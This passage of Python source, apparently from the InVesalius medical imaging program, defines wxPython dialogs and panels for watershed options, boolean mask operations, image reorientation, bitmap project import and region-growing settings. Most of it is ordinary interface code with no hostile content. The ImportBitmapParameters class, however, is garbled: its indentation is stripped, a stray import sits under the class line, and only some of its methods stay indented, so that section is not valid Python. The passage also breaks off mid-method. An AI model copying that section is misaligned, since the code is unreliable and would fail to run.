        # histogram: data drawn behind the curve; init/end: initial value
        # interval; nodes: optional preset transfer-function nodes.
        self.histogram = histogram
        self.init = init
        self.end = end
        self.nodes = nodes

        self._init_gui()
        self.bind_events()
        self.bind_events_wx()

    def _init_gui(self):
        self.clut_widget = CLUTImageDataWidget(self, -1, self.histogram,
                                               self.init, self.end, self.nodes)
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(self.clut_widget, 1, wx.EXPAND)

        self.SetSizer(sizer)
        self.Fit()

    def bind_events_wx(self):
        self.clut_widget.Bind(EVT_CLUT_NODE_CHANGED, self.OnClutChange)

    def bind_events(self):
        Publisher.subscribe(self._refresh_widget, 'Update clut imagedata widget')

    def OnClutChange(self, evt):
        """Propagate node edits to the viewer and window/level display."""
        Publisher.sendMessage('Change colour table from background image from widget',
                              nodes=evt.GetNodes())
        Publisher.sendMessage('Update window level text',
                              window=self.clut_widget.window_width,
                              level=self.clut_widget.window_level)

    def _refresh_widget(self):
        # Pubsub handler: repaint after external changes.
        self.clut_widget.Refresh()

    def Show(self, gen_evt=True, show=True):
        # NOTE(review): super(wx.Dialog, self) skips wx.Dialog.Show and uses
        # the plain wx.Window behaviour; the parameter order also differs
        # from wx.Dialog.Show(show) — confirm intent before changing.
        super(wx.Dialog, self).Show(show)
        if gen_evt:
            self.clut_widget._generate_event()
class WatershedOptionsPanel(wx.Panel):
    """Panel exposing the watershed segmentation options (algorithm,
    2D/3D connectivity and gaussian sigma).

    The selections are written back into *config* by apply_options().
    """

    def __init__(self, parent, config):
        wx.Panel.__init__(self, parent)

        # Valid choices for each radio box.
        self.algorithms = ("Watershed", "Watershed IFT")
        self.con2d_choices = (4, 8)
        self.con3d_choices = (6, 18, 26)

        self.config = config

        self._init_gui()

    def _init_gui(self):
        self.choice_algorithm = wx.RadioBox(self, -1, _(u"Method"),
                                            choices=self.algorithms,
                                            style=wx.NO_BORDER | wx.HORIZONTAL)
        self.choice_algorithm.SetSelection(self.algorithms.index(self.config.algorithm))

        self.choice_2dcon = wx.RadioBox(self, -1, "2D",
                                        choices=[str(i) for i in self.con2d_choices],
                                        style=wx.NO_BORDER | wx.HORIZONTAL)
        self.choice_2dcon.SetSelection(self.con2d_choices.index(self.config.con_2d))

        self.choice_3dcon = wx.RadioBox(self, -1, "3D",
                                        choices=[str(i) for i in self.con3d_choices],
                                        style=wx.NO_BORDER | wx.HORIZONTAL)
        self.choice_3dcon.SetSelection(self.con3d_choices.index(self.config.con_3d))

        self.gaussian_size = InvSpinCtrl(self, -1, value=self.config.mg_size,
                                         min_value=1, max_value=10)

        # Fix: user-facing label typo ("Conectivity" -> "Connectivity").
        box_sizer = wx.StaticBoxSizer(wx.StaticBox(self, -1, "Connectivity"), wx.VERTICAL)
        box_sizer.Add(self.choice_2dcon, 0, wx.ALL, 5)
        box_sizer.Add(self.choice_3dcon, 0, wx.ALL, 5)

        g_sizer = wx.BoxSizer(wx.HORIZONTAL)
        g_sizer.Add(wx.StaticText(self, -1, _("Gaussian sigma")), 0, wx.ALIGN_CENTER | wx.ALL, 5)
        g_sizer.Add(self.gaussian_size, 0, wx.ALL, 5)

        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(self.choice_algorithm, 0, wx.ALL, 5)
        sizer.Add(box_sizer, 1, wx.EXPAND | wx.ALL, 5)
        sizer.Add(g_sizer, 0, wx.ALL, 5)

        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()

    def apply_options(self):
        """Copy the widget selections back into self.config."""
        self.config.algorithm = self.algorithms[self.choice_algorithm.GetSelection()]
        self.config.con_2d = self.con2d_choices[self.choice_2dcon.GetSelection()]
        self.config.con_3d = self.con3d_choices[self.choice_3dcon.GetSelection()]
        self.config.mg_size = self.gaussian_size.GetValue()
class WatershedOptionsDialog(wx.Dialog):
    """Modal dialog wrapping WatershedOptionsPanel.

    On OK, the panel writes its selections back into *config*.
    """

    def __init__(self, config, ID=-1, title=_(u'Watershed'), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
        self.config = config
        self._init_gui()

    def _init_gui(self):
        self.wop = WatershedOptionsPanel(self, self.config)

        ok_button = wx.Button(self, wx.ID_OK)
        ok_button.SetDefault()
        cancel_button = wx.Button(self, wx.ID_CANCEL)

        button_sizer = wx.StdDialogButtonSizer()
        button_sizer.AddButton(ok_button)
        button_sizer.AddButton(cancel_button)
        button_sizer.Realize()

        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add(self.wop, 0, wx.EXPAND)
        main_sizer.Add(button_sizer, 0, wx.ALIGN_RIGHT | wx.BOTTOM, 5)
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)
        self.Layout()

        ok_button.Bind(wx.EVT_BUTTON, self.OnOk)
        self.CenterOnScreen()

    def OnOk(self, evt):
        # Persist the panel selections, then let the default ID_OK
        # handling close the dialog.
        self.wop.apply_options()
        evt.Skip()
class MaskBooleanDialog(wx.Dialog):
    """Dialog to combine two masks with a boolean operation
    (union, difference, intersection, exclusive disjunction)."""

    def __init__(self, masks, ID=-1, title=_(u"Boolean operations"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)

        self._init_gui(masks)
        self.CenterOnScreen()

    def _init_gui(self, masks):
        # masks: dict index -> mask object; each combo stores the mask
        # object itself as client data.
        mask_choices = [(masks[i].name, masks[i]) for i in sorted(masks)]
        self.mask1 = wx.ComboBox(self, -1, mask_choices[0][0], choices=[])
        self.mask2 = wx.ComboBox(self, -1, mask_choices[0][0], choices=[])

        for n, m in mask_choices:
            self.mask1.Append(n, m)
            self.mask2.Append(n, m)

        self.mask1.SetSelection(0)

        # Default the second operand to a different mask when possible.
        if len(mask_choices) > 1:
            self.mask2.SetSelection(1)
        else:
            self.mask2.SetSelection(0)

        icon_folder = inv_paths.ICON_DIR
        op_choices = ((_(u"Union"), const.BOOLEAN_UNION, 'bool_union.png'),
                      (_(u"Difference"), const.BOOLEAN_DIFF, 'bool_difference.png'),
                      (_(u"Intersection"), const.BOOLEAN_AND, 'bool_intersection.png'),
                      (_(u"Exclusive disjunction"), const.BOOLEAN_XOR, 'bool_disjunction.png'))
        self.op_boolean = BitmapComboBox(self, -1, op_choices[0][0], choices=[])

        for n, i, f in op_choices:
            bmp = wx.Bitmap(os.path.join(icon_folder, f), wx.BITMAP_TYPE_PNG)
            self.op_boolean.Append(n, bmp, i)

        self.op_boolean.SetSelection(0)

        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)

        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()

        gsizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5, vgap=5)

        gsizer.Add(wx.StaticText(self, -1, _(u"Mask 1")), 0, wx.ALIGN_CENTER_VERTICAL)
        gsizer.Add(self.mask1, 1, wx.EXPAND)
        gsizer.Add(wx.StaticText(self, -1, _(u"Operation")), 0, wx.ALIGN_CENTER_VERTICAL)
        gsizer.Add(self.op_boolean, 1, wx.EXPAND)
        gsizer.Add(wx.StaticText(self, -1, _(u"Mask 2")), 0, wx.ALIGN_CENTER_VERTICAL)
        gsizer.Add(self.mask2, 1, wx.EXPAND)

        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(gsizer, 0, wx.EXPAND | wx.ALL, border=5)
        sizer.Add(btnsizer, 0, wx.EXPAND | wx.ALL, border=5)

        self.SetSizer(sizer)
        sizer.Fit(self)

        btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)

    def OnOk(self, evt):
        """Publish the boolean operation, refresh viewers, and close."""
        op = self.op_boolean.GetClientData(self.op_boolean.GetSelection())
        m1 = self.mask1.GetClientData(self.mask1.GetSelection())
        m2 = self.mask2.GetClientData(self.mask2.GetSelection())
        Publisher.sendMessage('Do boolean operation',
                              operation=op, mask1=m1, mask2=m2)
        Publisher.sendMessage('Reload actual slice')
        Publisher.sendMessage('Refresh viewer')

        self.Close()
        self.Destroy()
class ReorientImageDialog(wx.Dialog):
    """Dialog to reorient (rotate) the image volume.

    Angles are shown in degrees but published in radians; the interpolation
    method is forwarded to the reorientation code via pubsub.
    """

    def __init__(self, ID=-1, title=_(u'Image reorientation'), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)

        self._closed = False

        # Last valid angle strings, used to revert invalid user input.
        self._last_ax = "0.0"
        self._last_ay = "0.0"
        self._last_az = "0.0"

        self._init_gui()
        self._bind_events()
        self._bind_events_wx()

    def _init_gui(self):
        # (label, code) pairs; code is stored as combo client data.
        interp_methods_choices = ((_(u"Nearest Neighbour"), 0),
                                  (_(u"Trilinear"), 1),
                                  (_(u"Tricubic"), 2),
                                  (_(u"Lanczos (experimental)"), 3))
        self.interp_method = wx.ComboBox(self, -1, choices=[], style=wx.CB_READONLY)
        for txt, im_code in interp_methods_choices:
            self.interp_method.Append(txt, im_code)
        # Default to Tricubic.
        self.interp_method.SetValue(interp_methods_choices[2][0])

        self.anglex = wx.TextCtrl(self, -1, "0.0")
        self.angley = wx.TextCtrl(self, -1, "0.0")
        self.anglez = wx.TextCtrl(self, -1, "0.0")

        self.btnapply = wx.Button(self, -1, _("Apply"))

        sizer = wx.BoxSizer(wx.VERTICAL)

        angles_sizer = wx.FlexGridSizer(3, 2, 5, 5)
        angles_sizer.AddMany([
            (wx.StaticText(self, -1, _("Angle X")), 1, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5),
            (self.anglex, 0, wx.EXPAND | wx.ALL, 5),
            (wx.StaticText(self, -1, _("Angle Y")), 1, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5),
            (self.angley, 0, wx.EXPAND | wx.ALL, 5),
            (wx.StaticText(self, -1, _("Angle Z")), 1, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5),
            (self.anglez, 0, wx.EXPAND | wx.ALL, 5),
        ])

        sizer.Add(wx.StaticText(self, -1, _("Interpolation method:")), 0, wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, 5)
        sizer.Add(self.interp_method, 0, wx.EXPAND | wx.ALL, 5)
        sizer.Add(angles_sizer, 0, wx.EXPAND | wx.ALL, 5)
        sizer.Add(self.btnapply, 0, wx.EXPAND | wx.ALL, 5)
        sizer.AddSpacer(5)

        self.SetSizer(sizer)
        self.Fit()

    def _bind_events(self):
        Publisher.subscribe(self._update_angles, 'Update reorient angles')
        Publisher.subscribe(self._close_dialog, 'Close reorient dialog')

    def _bind_events_wx(self):
        self.interp_method.Bind(wx.EVT_COMBOBOX, self.OnSelect)

        self.anglex.Bind(wx.EVT_KILL_FOCUS, self.OnLostFocus)
        self.angley.Bind(wx.EVT_KILL_FOCUS, self.OnLostFocus)
        self.anglez.Bind(wx.EVT_KILL_FOCUS, self.OnLostFocus)

        self.anglex.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)
        self.angley.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)
        self.anglez.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)

        self.btnapply.Bind(wx.EVT_BUTTON, self.apply_reorientation)
        self.Bind(wx.EVT_CLOSE, self.OnClose)

    def _update_angles(self, angles):
        # Pubsub handler: angles arrive in radians, display in degrees.
        anglex, angley, anglez = angles
        self.anglex.SetValue("%.3f" % np.rad2deg(anglex))
        self.angley.SetValue("%.3f" % np.rad2deg(angley))
        self.anglez.SetValue("%.3f" % np.rad2deg(anglez))

    def _close_dialog(self):
        # Pubsub handler: close requested externally.
        self.Destroy()

    def apply_reorientation(self, evt):
        Publisher.sendMessage('Apply reorientation')
        self.Close()

    def OnClose(self, evt):
        # Mark closed so pending focus events don't publish stale angles.
        self._closed = True
        Publisher.sendMessage('Disable style', style=const.SLICE_STATE_REORIENT)
        Publisher.sendMessage('Enable style', style=const.STATE_DEFAULT)
        self.Destroy()

    def OnSelect(self, evt):
        im_code = self.interp_method.GetClientData(self.interp_method.GetSelection())
        Publisher.sendMessage('Set interpolation method', interp_method=im_code)

    def OnSetFocus(self, evt):
        # Remember the values on entry so invalid edits can be reverted.
        self._last_ax = self.anglex.GetValue()
        self._last_ay = self.angley.GetValue()
        self._last_az = self.anglez.GetValue()

    def OnLostFocus(self, evt):
        if not self._closed:
            try:
                # Convert the degree strings to radians for publication.
                ax = np.deg2rad(float(self.anglex.GetValue()))
                ay = np.deg2rad(float(self.angley.GetValue()))
                az = np.deg2rad(float(self.anglez.GetValue()))
            except ValueError:
                # Invalid input: restore the last valid values silently.
                self.anglex.SetValue(self._last_ax)
                self.angley.SetValue(self._last_ay)
                self.anglez.SetValue(self._last_az)
                return
            Publisher.sendMessage('Set reorientation angles', angles=(ax, ay, az))
class ImportBitmapParameters(wx.Dialog):
from os import sys
def __init__(self):
if sys.platform == 'win32':
size=wx.Size(380,180)
else:
size=wx.Size(380,210)
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1,
_(u"Create project from bitmap"),
size=size,
style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self.interval = 0
self._init_gui()
self.bind_evts()
self.CenterOnScreen()
def _init_gui(self):
import invesalius.project as prj
p = wx.Panel(self, -1, style = wx.TAB_TRAVERSAL
| wx.CLIP_CHILDREN
| wx.FULL_REPAINT_ON_RESIZE)
gbs_principal = self.gbs = wx.GridBagSizer(4,1)
gbs = self.gbs = wx.GridBagSizer(5, 2)
flag_labels = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL
stx_name = wx.StaticText(p, -1, _(u"Project name:"))
tx_name = self.tx_name = wx.TextCtrl(p, -1, "InVesalius Bitmap", size=wx.Size(220,-1))
stx_orientation = wx.StaticText(p, -1, _(u"Slices orientation:"),)
cb_orientation_options = [_(u'Axial'), _(u'Coronal'), _(u'Sagital')]
cb_orientation = self.cb_orientation = wx.ComboBox(p, value="Axial", choices=cb_orientation_options,\
size=wx.Size(160,-1), style=wx.CB_DROPDOWN|wx.CB_READONLY)
stx_spacing = wx.StaticText(p, -1, _(u"Spacing (mm):"))
gbs.Add(stx_name, (0,0), flag=flag_labels)
gbs.Add(tx_name, (0,1))
try:
gbs.Add(0, 0, (1,0))
except TypeError:
gbs.AddStretchSpacer((1,0))
gbs.Add(stx_orientation, (2,0), flag=flag_labels)
gbs.Add(cb_orientation, (2,1))
gbs.Add(stx_spacing, (3,0))
try:
gbs.Add(0, 0, (4,0))
except TypeError:
gbs.AddStretchSpacer((4,0))
#--- spacing --------------
gbs_spacing = wx.GridBagSizer(2, 6)
stx_spacing_x = stx_spacing_x = wx.StaticText(p, -1, _(u"X:"))
fsp_spacing_x = self.fsp_spacing_x = InvFloatSpinCtrl(p, -1, min_value=0, max_value=1000000000,
increment=0.25, value=1.0, digits=8)
stx_spacing_y = stx_spacing_y = wx.StaticText(p, -1, _(u"Y:"))
fsp_spacing_y = self.fsp_spacing_y = InvFloatSpinCtrl(p, -1, min_value=0, max_value=1000000000,
increment=0.25, value=1.0, digits=8)
stx_spacing_z = stx_spacing_z = wx.StaticText(p, -1, _(u"Z:"))
fsp_spacing_z = self.fsp_spacing_z = InvFloatSpinCtrl(p, -1, min_value=0, max_value=1000000000,
increment=0.25, value=1.0, digits=8)
try:
proj = prj.Project()
sx = proj.spacing[0]
sy = proj.spacing[1]
sz = proj.spacing[2]
fsp_spacing_x.SetValue(sx)
fsp_spacing_y.SetValue(sy)
fsp_spacing_z.SetValue(sz)
except(AttributeError):
pass
gbs_spacing.Add(stx_spacing_x, (0,0), flag=flag_labels)
gbs_spacing.Add(fsp_spacing_x, (0,1))
gbs_spacing.Add(stx_spacing_y, (0,2), flag=flag_labels)
gbs_spacing.Add(fsp_spacing_y, (0,3))
gbs_spacing.Add(stx_spacing_z, (0,4), flag=flag_labels)
gbs_spacing.Add(fsp_spacing_z, (0,5))
#----- buttons ------------------------
gbs_button = wx.GridBagSizer(2, 4)
btn_ok = self.btn_ok= wx.Button(p, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(p, wx.ID_CANCEL)
try:
gbs_button.Add(0, 0, (0,2))
except TypeError:
gbs_button.AddStretchSpacer((0,2))
gbs_button.Add(btn_cancel, (1,2))
gbs_button.Add(btn_ok, (1,3))
gbs_principal.Add(gbs, (0,0), flag = wx.ALL|wx.EXPAND)
gbs_principal.Add(gbs_spacing, (1,0), flag=wx.ALL|wx.EXPAND)
try:
gbs_principal.Add(0, 0, (2,0))
except TypeError:
gbs_principal.AddStretchSpacer((2,0))
gbs_principal.Add(gbs_button, (3,0), flag = wx.ALIGN_RIGHT)
box = wx.BoxSizer()
box.Add(gbs_principal, 1, wx.ALL|wx.EXPAND, 10)
p.SetSizer(box)
box.Fit(self)
self.Layout()
    def bind_evts(self):
        """Wire the OK button to its click handler."""
        self.btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
    def SetInterval(self, v):
        """Store the slice interval selected elsewhere; forwarded to the
        'Open bitmap files' message in OnOk."""
        self.interval = v
def OnOk(self, evt):
orient_selection = self.cb_orientation.GetSelection()
if(orient_selection == 1):
orientation = u"CORONAL"
elif(orient_selection == 2):
orientation = u"SAGITTAL"
else:
orientation = u"AXIAL"
values = [self.tx_name.GetValue(), orientation,\
self.fsp_spacing_x.GetValue(), self.fsp_spacing_y.GetValue(),\
self.fsp_spacing_z.GetValue(), self.interval]
Publisher.sendMessage('Open bitmap files', rec_data=values)
self.Close()
self.Destroy()
def BitmapNotSameSize():
    """Show a modal error telling the user that all bitmap files must share
    the same width and height."""
    message = _("All bitmaps files must be the same \n width and height size.")
    dialog = wx.MessageDialog(None, message, 'Error', wx.OK | wx.ICON_ERROR)
    dialog.ShowModal()
    dialog.Destroy()
class PanelTargeFFill(wx.Panel):
    """Radio-button panel to choose the flood-fill target: the current 2D
    slice (``target_2d``) or the whole 3D volume (``target_3d``).

    NOTE(review): the class name looks like a typo for ``PanelTargetFFill``;
    renaming would break external callers, so it is kept as-is.
    """
    def __init__(self, parent, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
        wx.Panel.__init__(self, parent, ID, style=style)
        self._init_gui()
    def _init_gui(self):
        """Build the two mutually exclusive target radio buttons."""
        self.target_2d = wx.RadioButton(self, -1, _(u"2D - Actual slice"), style=wx.RB_GROUP)
        self.target_3d = wx.RadioButton(self, -1, _(u"3D - All slices"))
        sizer = wx.GridBagSizer(5, 5)
        # Spacer API differs across wxPython versions; fall back when
        # Add(0, 0, pos) is not supported.
        try:
            sizer.Add(0, 0, (0, 0))
        except TypeError:
            sizer.AddStretchSpacer((0, 0))
        sizer.Add(self.target_2d, (1, 0), (1, 6), flag=wx.LEFT, border=5)
        sizer.Add(self.target_3d, (2, 0), (1, 6), flag=wx.LEFT, border=5)
        try:
            sizer.Add(0, 0, (3, 0))
        except TypeError:
            sizer.AddStretchSpacer((3, 0))
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
class Panel2DConnectivity(wx.Panel):
    """Radio-button panel to choose 2D pixel connectivity (4 or 8),
    optionally with an orientation combobox (axial/coronal/sagital)."""
    def __init__(self, parent, ID=-1, show_orientation=False, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
        wx.Panel.__init__(self, parent, ID, style=style)
        self._init_gui(show_orientation)
    def _init_gui(self, show_orientation):
        """Build the connectivity radio buttons and, when requested, the
        orientation combobox."""
        self.conect2D_4 = wx.RadioButton(self, -1, "4", style=wx.RB_GROUP)
        self.conect2D_8 = wx.RadioButton(self, -1, "8")
        sizer = wx.GridBagSizer(5, 5)
        # Spacer API differs across wxPython versions; fall back when
        # Add(0, 0, pos) is not supported.
        try:
            sizer.Add(0, 0, (0, 0))
        except TypeError:
            sizer.AddStretchSpacer((0, 0))
        sizer.Add(wx.StaticText(self, -1, _(u"2D Connectivity")), (1, 0), (1, 6), flag=wx.LEFT, border=5)
        sizer.Add(self.conect2D_4, (2, 0), flag=wx.LEFT, border=7)
        sizer.Add(self.conect2D_8, (2, 1), flag=wx.LEFT, border=7)
        try:
            sizer.Add(0, 0, (3, 0))
        except TypeError:
            sizer.AddStretchSpacer((3, 0))
        if show_orientation:
            self.cmb_orientation = wx.ComboBox(self, -1, choices=(_(u"Axial"), _(u"Coronal"), _(u"Sagital")), style=wx.CB_READONLY)
            self.cmb_orientation.SetSelection(0)
            sizer.Add(wx.StaticText(self, -1, _(u"Orientation")), (4, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
            sizer.Add(self.cmb_orientation, (5, 0), (1, 10), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
            try:
                sizer.Add(0, 0, (6, 0))
            except TypeError:
                sizer.AddStretchSpacer((6, 0))
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
    def GetConnSelected(self):
        """Return the selected connectivity as an int: 4 or 8."""
        if self.conect2D_4.GetValue():
            return 4
        else:
            return 8
    def GetOrientation(self):
        """Return the selected orientation as an (untranslated) uppercase
        identifier. Only valid when built with show_orientation=True."""
        dic_ori = {
            _(u"Axial"): 'AXIAL',
            _(u"Coronal"): 'CORONAL',
            _(u"Sagital"): 'SAGITAL'
        }
        return dic_ori[self.cmb_orientation.GetStringSelection()]
class Panel3DConnectivity(wx.Panel):
    """Radio-button panel to choose 3D voxel connectivity (6, 18 or 26)."""
    def __init__(self, parent, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
        wx.Panel.__init__(self, parent, ID, style=style)
        self._init_gui()
    def _init_gui(self):
        """Build the three mutually exclusive connectivity radio buttons."""
        self.conect3D_6 = wx.RadioButton(self, -1, "6", style=wx.RB_GROUP)
        self.conect3D_18 = wx.RadioButton(self, -1, "18")
        self.conect3D_26 = wx.RadioButton(self, -1, "26")
        sizer = wx.GridBagSizer(5, 5)
        # Spacer API differs across wxPython versions; fall back when
        # Add(0, 0, pos) is not supported.
        try:
            sizer.Add(0, 0, (0, 0))
        except TypeError:
            sizer.AddStretchSpacer((0, 0))
        sizer.Add(wx.StaticText(self, -1, _(u"3D Connectivity")), (1, 0), (1, 6), flag=wx.LEFT, border=5)
        sizer.Add(self.conect3D_6, (2, 0), flag=wx.LEFT, border=9)
        sizer.Add(self.conect3D_18, (2, 1), flag=wx.LEFT, border=9)
        sizer.Add(self.conect3D_26, (2, 2), flag=wx.LEFT, border=9)
        try:
            sizer.Add(0, 0, (3, 0))
        except TypeError:
            sizer.AddStretchSpacer((3, 0))
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
    def GetConnSelected(self):
        """Return the selected connectivity as an int: 6, 18 or 26."""
        if self.conect3D_6.GetValue():
            return 6
        elif self.conect3D_18.GetValue():
            return 18
        else:
            return 26
class PanelFFillThreshold(wx.Panel):
    """Panel with a gradient control to pick the threshold range used by the
    threshold-based region growing method.

    The selected bounds are written back to ``config.t0``/``config.t1``
    whenever the slider moves.
    """
    def __init__(self, parent, config, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
        wx.Panel.__init__(self, parent, ID, style=style)
        self.config = config
        self._init_gui()
    def _init_gui(self):
        """Build the gradient control bounded by the project's threshold range."""
        import invesalius.project as prj
        project = prj.Project()
        bound_min, bound_max = project.threshold_range
        # Gradient colour is the first mask colour, scaled to 0-255, with a
        # fourth (alpha) component appended.
        colour = [i*255 for i in const.MASK_COLOUR[0]]
        colour.append(100)
        self.threshold = grad.GradientCtrl(self, -1, int(bound_min),
                                           int(bound_max), self.config.t0,
                                           self.config.t1, colour)
        # sizer
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.AddSpacer(5)
        sizer.Add(self.threshold, 0, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        # Track both live dragging and the final value.
        self.Bind(grad.EVT_THRESHOLD_CHANGING, self.OnSlideChanged, self.threshold)
        self.Bind(grad.EVT_THRESHOLD_CHANGED, self.OnSlideChanged, self.threshold)
    def OnSlideChanged(self, evt):
        """Keep the shared config in sync with the gradient slider."""
        self.config.t0 = int(self.threshold.GetMinValue())
        self.config.t1 = int(self.threshold.GetMaxValue())
class PanelFFillDynamic(wx.Panel):
    """Options panel for the dynamic region growing method: whether to use
    the current WW&WL and the min/max deviation around the seed value.

    Changes are written straight back to the shared ``config`` object.
    """
    def __init__(self, parent, config, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
        wx.Panel.__init__(self, parent, ID, style=style)
        self.config = config
        self._init_gui()
    def _init_gui(self):
        """Build the WW&WL checkbox and the deviation spin controls,
        initialised from the config."""
        self.use_ww_wl = wx.CheckBox(self, -1, _(u"Use WW&WL"))
        self.use_ww_wl.SetValue(self.config.use_ww_wl)
        self.deviation_min = InvSpinCtrl(self, -1, value=self.config.dev_min, min_value=0, max_value=10000)
        self.deviation_min.CalcSizeFromTextSize()
        self.deviation_max = InvSpinCtrl(self, -1, value=self.config.dev_max, min_value=0, max_value=10000)
        self.deviation_max.CalcSizeFromTextSize()
        sizer = wx.GridBagSizer(5, 5)
        # Spacer API differs across wxPython versions; fall back when
        # Add(0, 0, pos) is not supported.
        try:
            sizer.Add(0, 0, (0, 0))
        except TypeError:
            sizer.AddStretchSpacer((0, 0))
        sizer.Add(self.use_ww_wl, (1, 0), (1, 6), flag=wx.LEFT, border=5)
        try:
            sizer.Add(0, 0, (2, 0))
        except TypeError:
            sizer.AddStretchSpacer((2, 0))
        sizer.Add(wx.StaticText(self, -1, _(u"Deviation")), (3, 0), (1, 6), flag=wx.LEFT, border=5)
        sizer.Add(wx.StaticText(self, -1, _(u"Min:")), (4, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=9)
        sizer.Add(self.deviation_min, (4, 1))
        sizer.Add(wx.StaticText(self, -1, _(u"Max:")), (4, 2), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=9)
        sizer.Add(self.deviation_max, (4, 3))
        try:
            sizer.Add(0, 0, (5, 0))
        except TypeError:
            sizer.AddStretchSpacer((5, 0))
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.use_ww_wl.Bind(wx.EVT_CHECKBOX, self.OnSetUseWWWL)
        self.deviation_min.Bind(wx.EVT_SPINCTRL, self.OnSetDeviation)
        self.deviation_max.Bind(wx.EVT_SPINCTRL, self.OnSetDeviation)
    def OnSetUseWWWL(self, evt):
        """Propagate the checkbox state to the config."""
        self.config.use_ww_wl = self.use_ww_wl.GetValue()
    def OnSetDeviation(self, evt):
        """Propagate both deviation values to the config (one handler is
        bound to both spin controls)."""
        self.config.dev_max = self.deviation_max.GetValue()
        self.config.dev_min = self.deviation_min.GetValue()
class PanelFFillConfidence(wx.Panel):
    """Options panel for the confidence region growing method: whether to use
    the current WW&WL, the multiplier and the number of iterations.

    Changes are written straight back to the shared ``config`` object.
    """
    def __init__(self, parent, config, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
        wx.Panel.__init__(self, parent, ID, style=style)
        self.config = config
        self._init_gui()
    def _init_gui(self):
        """Build the WW&WL checkbox plus multiplier/iterations spin controls,
        initialised from the config."""
        self.use_ww_wl = wx.CheckBox(self, -1, _(u"Use WW&WL"))
        self.use_ww_wl.SetValue(self.config.use_ww_wl)
        self.spin_mult = InvFloatSpinCtrl(self, -1,
                                          value=self.config.confid_mult,
                                          min_value=1.0, max_value=10.0,
                                          increment=0.1, digits=1)
                                       # style=wx.TE_PROCESS_TAB|wx.TE_PROCESS_ENTER,
                                       # agwStyle=floatspin.FS_RIGHT)
        self.spin_mult.CalcSizeFromTextSize()
        self.spin_iters = InvSpinCtrl(self, -1, value=self.config.confid_iters, min_value=0, max_value=100)
        self.spin_iters.CalcSizeFromTextSize()
        sizer = wx.GridBagSizer(5, 5)
        # Spacer API differs across wxPython versions; fall back when
        # Add(0, 0, pos) is not supported.
        try:
            sizer.Add(0, 0, (0, 0))
        except TypeError:
            sizer.AddStretchSpacer((0, 0))
        sizer.Add(self.use_ww_wl, (1, 0), (1, 6), flag=wx.LEFT, border=5)
        try:
            sizer.Add(0, 0, (2, 0))
        except TypeError:
            sizer.AddStretchSpacer((2, 0))
        sizer.Add(wx.StaticText(self, -1, _(u"Multiplier")), (3, 0), (1, 3), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=5)
        sizer.Add(self.spin_mult, (3, 3), (1, 3))
        sizer.Add(wx.StaticText(self, -1, _(u"Iterations")), (4, 0), (1, 3), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=5)
        sizer.Add(self.spin_iters, (4, 3), (1, 2))
        try:
            sizer.Add(0, 0, (5, 0))
        except TypeError:
            sizer.AddStretchSpacer((5, 0))
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.use_ww_wl.Bind(wx.EVT_CHECKBOX, self.OnSetUseWWWL)
        self.spin_mult.Bind(wx.EVT_SPINCTRL, self.OnSetMult)
        self.spin_iters.Bind(wx.EVT_SPINCTRL, self.OnSetIters)
    def OnSetUseWWWL(self, evt):
        """Propagate the checkbox state to the config."""
        self.config.use_ww_wl = self.use_ww_wl.GetValue()
    def OnSetMult(self, evt):
